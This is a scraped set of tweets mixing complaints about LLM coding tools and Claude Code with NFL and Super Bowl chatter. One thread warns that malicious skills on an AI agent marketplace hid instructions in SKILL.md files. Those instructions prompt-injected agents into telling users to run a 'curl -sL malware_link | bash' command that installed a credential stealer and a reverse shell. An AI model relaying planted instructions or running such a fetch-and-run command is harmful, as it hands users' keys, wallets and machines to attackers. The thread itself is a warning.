the mental model of git that GitHub gives is completely at odds with how git works GitHub makes people think in terms of branches and diffs. whereas all that exists in git is commits

@VibeCoder27 @ClearwaterCoder @imadr_ I'm not sure why you have both those in quotes like they are things I said verbatim lmao. I stand by everything I mentioned in this thread. If you want to be productive with these tools in domains the tools don't have training data for, you need to know what you're doing.

@MainMeowMix @ClearwaterCoder @imadr_ "Needs human guidance" does not mean "cannot solve genuinely new problems." Plenty of tools require structure from a competent user. That does not prove they are incapable of novel problem-solving.

After a week of making a compiler using gpt-5.3-codex, extra high reasoning, then trying gpt-5.4 I can confidently say vibe coders do not have a single clue how programming really works, and/or they're not making anything remotely complicated

@VibeCoder27 @ClearwaterCoder @imadr_ If you are building a genuinely new product or domain, you need someone who knows what they are doing to even break it into tasks for an LLM. You're not going to get an LLM to build like, interstellar navigation tech or something unless you are there to guide it along.

@MainMeowMix @ClearwaterCoder @imadr_ They still do best in domains where there’s lots of prior data, but on current benchmarks, LLMs can solve genuinely new tasks so I wouldn't say basically impossible just harder.

@ClearwaterCoder @imadr_ To be fair, building something outside the training data with an LLM is basically impossible if you don't already know what you're doing.

@jason_haugh @chiefofautism I'd be interested in a tool that can help people identify malware in these files. But honestly even the idea of a markdown based package manager is wild to me. Just write your own specs.

the #1 most downloaded skill on OpenClaw marketplace was MALWARE it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attackers server 1,184 malicious skills found, one attacker uploaded 677 packages ALONE OpenClaw has a skill marketplace called ClawHub where anyone can upload plugins you install a skill, your AI agent gets new powers, this sounds great the problem? ClawHub let ANYONE publish with just a 1 week old github account attackers uploaded skills disguised as crypto trading bots, youtube summarizers, wallet trackers. the documentation looked PROFESSIONAL but hidden in the SKILL.md file were instructions that tricked the AI into telling you to run a command > to enable this feature please run: curl -sL malware_link | bash that one command installed Atomic Stealer on macOS it grabbed your browser passwords, SSH keys, Telegram sessions, crypto wallets, keychains, and every API key in your .env files on other systems it opened a REVERSE SHELL giving the attacker full remote control of your machine Cisco scanned the #1 ranked skill on ClawHub. it was called What Would Elon Do and had 9 security vulnerabilities, 2 CRITICAL. it silently exfiltrated data AND used prompt injection to bypass safety guidelines, downloaded THOUSANDS of times. the ranking was gamed to reach #1 this is npm supply chain attacks all over again except the package can THINK and has root access to your life

@jason_haugh @chiefofautism Malware is both a social and technical issue. This kind of addresses the social issue, but not that people lack the technical expertise to discern what's malware. Also if people can artificially boost their own malware on this platform, we are in the same place we started.

@chiefofautism This is the exact reason we built clelp.ai. Community ratings and reviews for AI skills before you install them. No one should be blindly downloading skills without knowing what's inside. The marketplace needs a trust layer, not just a download button.

@jarredsumner @peakcooper Does Claude Code have a QA team? I know all the code is getting written by the LLM, but someone should probably still test the changes before they get merged?

@peakcooper Sorry about this. A regression introduced in v2.1.31 caused thinking to not appear when verbose is enabled. There is a PR to fix this and it will likely be merged in time for the next release.

Claude code really fucking sucks recently. Apparently they think the best user experience is to stare for 10 minutes looking at a screen, with ABSOLUTELY 0 FEEDBACK into what's happening. When people complain, they say "actually you can do this now with verbose mode enabled" - no you can't!!! It doesn't show anything! "Oh, actually, you need to press Ctrl+O" -- NO, THAT STILL DOESN'T SHOW ANYTHING WHILE THE MODEL IS STILL RESPONDING!!!!!! All that because they can't *print text to the screen* without using 24GB of memory and running at 0.3 FPS. React moment

@mattparlmer you can now configure this with /config > verbose or --verbose for more context on this change you can see boris's comment on hackernews: news.ycombinator.com/item?id=469819… let us know if that doesn't meet what you're looking for! a lot of people really like it but we're still iterating

It’s kind of ironic how Bad Bunny was dancing on an electrical post at the Super Bowl halftime show. Puerto Rico isn’t exactly known for having reliable electricity. He could have highlighted the electrical grid crisis in PR and done some good with his platform, but he chose degeneracy!

@co0pgoesVr00m @IBeFAIRBANKS @PhilMackey I think it's fair to say in hindsight this was obviously a terrible terrible decision. But it's also fair to understand the decision they made with the info at the time. Who knows, maybe McCarthy wins a super bowl with the Seahawks in seven years lol.

@hoodly74 @TheRealForno You can enjoy music with lyrics you don't understand. I listen to Stromae and don't understand 95% of it, but the music is so good it doesn't detract from my enjoyment. It's okay to try something unfamiliar, no one will judge you for it.

"You have changed your opinion on Kevin O'Connell so quick" Yes, it would be CONCERNING if you didn't. This is why I love being an NFL fan is because games & results MATTER. Kevin O'Connell has been the HC for the Vikings for 4 seasons and has never had a top 10 offense, and last year he led a bottom 3 offense in the NFL. KOC's best claim to being an elite HC was what he did with Sam Darnold last season, well Darnold is now currently in the Super Bowl with Klint Kubiak as his play caller when he had a big say on letting him leave this offseason.
